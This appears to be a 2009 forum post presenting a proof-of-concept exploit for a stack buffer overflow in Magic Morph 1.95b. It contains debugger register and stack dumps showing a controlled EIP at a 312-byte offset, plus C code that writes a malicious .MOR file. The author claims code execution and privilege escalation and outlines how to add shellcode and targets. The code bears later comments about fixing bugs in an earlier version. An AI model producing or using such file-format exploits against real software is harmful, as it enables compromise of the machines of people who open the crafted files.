fl0 fl0w Posted September 14, 2009 Report Posted September 14, 2009 (edited)
My new exploit. Pentru mai multe detalii privind debugging, am pus screenshoturi si altele:
http://rapidshare.com/files/279955517/Portable_E.M_Magic_Morph_1.95b_Buffer_Overflow.zip.html
http://www.2shared.com/file/7794630/5e98eb46/Portable_EM_Magic_Morph_195b_Buffer_Overflow.html
http://www.turboupload.com/2y6snh3b5fad/Portable_E.M_Magic_Morph_1.95b_Buffer_Overflow.zip.html
Acest buffer overflow este 100% exploatabil, rezultand in executie de cod pe un target, capatand astfel drepturi de ADMIN pornind de la statusul de USER. Partea cea mai dificila este programarea shellcodului, deoarece softul are probleme cand intampina anumite caractere speciale.
1. Trebuie identificate aceste caractere.
2. Shellcode programat dupa conditiile de fata.
3. Exploit imbunatatit prin adaugarea de MULTI-TARGET'URI si multiple shellcoduri.
/*************************************************
 * Magic Morph .MOR File Stack Buffer Overflow POC
 * By fl0 fl0w
 *************************************************/
/******************************************************************************************************
 * The EIP offset is at 312 bytes (0x138 hex).
 * After you compile and create the .MOR file, edit it with a hex editor and start counting from the start
 * of the file; you should end up with 0x138 bytes.
 *
 * I used a technique named "stack spray" to determine the offset.
**CPU REGISTERS *EAX 00000000 *ECX 33333333 *EDX 01492288 *EBX 00000001 **ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa *````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223 *EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b *bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa **ESI 00F369B0 *EDI 00F369B0 *EIP 41414141 **We control ECX, EIP witch is more than enought to copy what addresess you want in the memory. *So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption*starts at a much lower address. *This is what ESP points to: **********************************************************************************************************//************************STACK *0012EF7C 62343434 *0012EF80 62626262 *0012EF84 62626262 *0012EF88 67676262 *0012EF8C 67676767 *0012EF90 67676767 *0012EF94 67676767 *0012EF98 62676767 *0012EF9C 61616161 *0012EFA0 61616161 *0012EFA4 61616161 *0012EFA8 61616161 *0012EFAC 61616161 *0012EFB0 61616161 *0012EFB4 61616161 *0012EFB8 61616161 *0012EFBC 61616161 *0012EFC0 61616161 *0012EFC4 61616161 *0012EFC8 61616161 *0012EFCC 60606060 *0012EFD0 60606060 *0012EFD4 60606060 *0012EFD8 60606060 *0012EFDC 60606060 *0012EFE0 60606060 *0012EFE4 60606060 *0012EFE8 60606060 *0012EFF0 60606060 *0012EFF4 60606060 *0012EFF8 60606060 *0012EFFC 59595959 *0012F000 59595959 *0012F004 59595959 *0012F008 59595959 *0012F00C 59595959 *..................... 
*************************//*************************************************You can copy your shellcode starting from here : *0012EC3C 63636363 **0x12EF80 = 1240960 ->NOT-> A **0x12EC3C = 1240124 ->NOT-> B **A > B *A - B = 836 = 0x344 *So the stack gets corrupted a long way from ESP.***************************************************//*************************************************LOOK OF THE DUMP *0012EE4C 63 63 63 63 cccc *0012EE54 63 63 63 63 63 63 63 63 cccccccc *0012EE5C 32 32 32 32 32 32 32 32 22222222 *0012EE64 32 33 33 33 33 33 33 33 23333333 *0012EE6C 33 33 33 66 66 66 66 66 333fffff *0012EE74 41 41 41 41 77 77 34 34 AAAAww44 *0012EE7C 34 34 34 62 62 62 62 62 444bbbbb *0012EE84 62 62 62 62 62 62 67 67 bbbbbbgg *0012EE8C 67 67 67 67 67 67 67 67 gggggggg *0012EE94 67 67 67 67 67 67 67 62 gggggggb *0012EE9C 61 61 61 61 61 61 61 61 aaaaaaaa *0012EEA4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EEAC 61 61 61 61 61 61 61 61 aaaaaaaa *0012EEB4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EEBC 61 61 61 61 61 61 61 61 aaaaaaaa *0012EEC4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EECC 60 60 60 60 60 60 60 60 ```````` *0012EED4 60 60 60 60 60 60 60 60 ```````` *0012EEDC 60 60 60 60 60 60 60 60 ```````` *0012EEE4 60 60 60 60 60 60 60 60 ```````` *0012EEEC 60 60 60 60 60 60 60 60 ```````` *0012EEF4 60 60 60 60 60 60 60 60 ```````` *0012EEFC 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF04 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF0C 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF14 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF1C 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF24 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF2C 58 58 58 58 58 58 58 58 XXXXXXXX *0012EF34 58 58 58 58 58 58 58 58 XXXXXXXX *0012EF3C 63 63 63 63 63 63 63 63 cccccccc *0012EF44 63 63 63 63 63 63 63 63 cccccccc *0012EF4C 63 63 63 63 63 63 63 63 cccccccc *0012EF54 63 63 63 63 63 63 63 63 cccccccc *0012EF5C 32 32 32 32 32 32 32 32 22222222 *0012EF64 32 33 33 33 33 33 33 33 23333333 *0012EF6C 33 33 33 66 66 66 66 66 333fffff *0012EF74 41 41 41 41 
77 77 34 34 AAAAww44 *0012EF7C 34 34 34 62 62 62 62 62 444bbbbb *0012EF84 62 62 62 62 62 62 67 67 bbbbbbgg *0012EF8C 67 67 67 67 67 67 67 67 gggggggg *0012EF94 67 67 67 67 67 67 67 62 gggggggb *0012EF9C 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFA4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFAC 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFB4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFBC 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFC4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFCC 60 60 60 60 60 60 60 60 ```````` *0012EFD4 60 60 60 60 60 60 60 60 ```````` *0012EFDC 60 60 60 60 60 60 60 60 ```````` *0012EFE4 60 60 60 60 60 60 60 60 ```````` *0012EFEC 60 60 60 60 60 60 60 60 ```````` *0012EFF4 60 60 60 60 60 60 60 60 ```````` *0012EFFC 59 59 59 59 59 59 59 59 YYYYYYYY *0012F004 59 59 59 59 59 59 59 59 YYYYYYYY *0012F00C 59 59 59 59 59 59 59 59 YYYYYYYY ***************************************************//**************************************************************************************Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org *Special greetz to OSHO,!_30,str0ke,Carcabot. *Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. *flo's exploits ***************************************************************************************//*************************************************************************DEMO *C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe ********************************************************************** *Magic Morph .MOR File Stack Buffer Overflow POC *The usage is: *All Credits fl0 fl0w **-f FILE.mor ****************************************************************************C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST *File DONE ! 
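****************************************************************************/
/**************************************************************************
 * Technical details
 * This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3
 **************************************************************************/
// START Algorithm
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#ifdef _WIN32
#include <windows.h>   /* Windows-only; nothing below needs it elsewhere */
#endif

/*
 * Three-byte file prefix ("C:\").  The fields are written one at a time in
 * buildFile(), so the struct's in-memory layout never reaches the output.
 */
typedef struct flo {
    uint8_t a;
    uint8_t b;
    uint8_t c;
} F;

/*
 * Write the crafted .MOR file to `fname`: the 3-byte prefix followed by the
 * three fixed byte tables below, in order.
 *
 * Returns 0 on success and -1 when `fname` is NULL, the file cannot be
 * opened, or a write/close fails (the reason is printed with perror()).  The
 * original returned void and ignored every I/O result; callers that ignore
 * the return value are unaffected.
 */
int buildFile(char *fname)
{
    static const uint8_t hexfileP1[] = {
        0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64,
        0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E,
        0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73,
        0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
        0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
        0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
        0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33,
        0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34,
        0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67,
        0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62,
    };
    static const uint8_t hexfileP2[] = {
        0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
        0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
        0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
        0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
        0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
        0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
        0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
        0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
        0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
    };
    static const uint8_t hexfileP3[] = {
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73,
        0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74,
        0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74,
        0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C,
        0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    };

    if (fname == NULL) {
        fputs("buildFile: no output file name\n", stderr);
        return -1;
    }

    FILE *f = fopen(fname, "wb");
    if (f == NULL) {
        perror(fname);   /* the original continued and dereferenced NULL */
        return -1;
    }

    /*
     * Prefix bytes, copied out of the struct one field at a time.  The
     * original memcpy'd sizeof(pointer) bytes out of a 3-byte malloc() into a
     * scratch buffer (a heap over-read) and then leaked the allocation.
     */
    const F hdr = { .a = 0x43, .b = 0x3A, .c = 0x5C };
    const uint8_t prefix[3] = { hdr.a, hdr.b, hdr.c };

    int rc = 0;
    if (fwrite(prefix, 1, sizeof prefix, f) != sizeof prefix
        || fwrite(hexfileP1, 1, sizeof hexfileP1, f) != sizeof hexfileP1
        || fwrite(hexfileP2, 1, sizeof hexfileP2, f) != sizeof hexfileP2
        || fwrite(hexfileP3, 1, sizeof hexfileP3, f) != sizeof hexfileP3) {
        perror(fname);
        rc = -1;
    }
    /* fclose() flushes; a short write can surface only here. */
    if (fclose(f) != 0) {
        perror(fname);
        rc = -1;
    }
    return rc;
}

/*
 * Parse "-f FILE" from the command line with getopt().
 *
 * Returns the argument given to -f, or NULL when the option is absent.
 * Exits with EXIT_FAILURE on an unknown option or a missing -f argument.
 *
 * The original tested an uninitialized flag before the loop, passed "f"
 * (no ':', so optarg was always NULL) and truncated that pointer to an int;
 * it was also never called.
 */
const char *args(int argc, char *argv[])
{
    const char *file = NULL;
    int opt;

    while ((opt = getopt(argc, argv, "f:")) != -1) {
        switch (opt) {
        case 'f':
            file = optarg;
            break;
        default:
            exit(EXIT_FAILURE);
        }
    }
    return file;
}

/* Print the banner.  `Name` (the program name) is accepted but not printed. */
void Usage(char *Name)
{
    (void)Name;
#ifdef _WIN32
    system("CLS");   /* fixed command string; no external input reaches the shell */
#endif
    printf("*********************************************************************\n");
    fprintf(stdout, "\t\tMagic Morph .MOR File Stack Buffer Overflow POC\n");
    printf("The usage is:\n");
    fprintf(stdout, "\t\tAll Credits fl0 fl0w\n");
}

/* Print the option summary to stderr. */
void Menu(void)
{
    fprintf(stderr,
            "\n"
            "\t-f FILE.mor\n"
            "*********************************************************************"
            "\n");
}

/*
 * Entry point: `mm -f NAME` writes NAME.mor in the current directory.
 *
 * Returns 0 on success, EXIT_FAILURE on bad usage, an over-long name, or a
 * failed write.  The original copied argv[2] into a 100-byte stack buffer
 * with strcpy/strcat (no bound, and argv[2] may be NULL when argc == 2) and
 * the call `buildFile(;` did not compile.
 */
int main(int argc, char *argv[])
{
    if (argc < 2) {
        Usage(argv[0]);
        Menu();
        return EXIT_FAILURE;
    }

    const char *name = args(argc, argv);
    if (name == NULL) {
        Usage(argv[0]);
        Menu();
        return EXIT_FAILURE;
    }

    /* NAME + ".mor", bounded; reject instead of truncating silently. */
    char b[100];
    int n = snprintf(b, sizeof b, "%s.mor", name);
    if (n < 0 || (size_t)n >= sizeof b) {
        fputs("file name too long\n", stderr);
        return EXIT_FAILURE;
    }

    if (buildFile(b) != 0) {
        return EXIT_FAILURE;
    }
    printf("File DONE !\n");
    return 0;
}
// END Algorithm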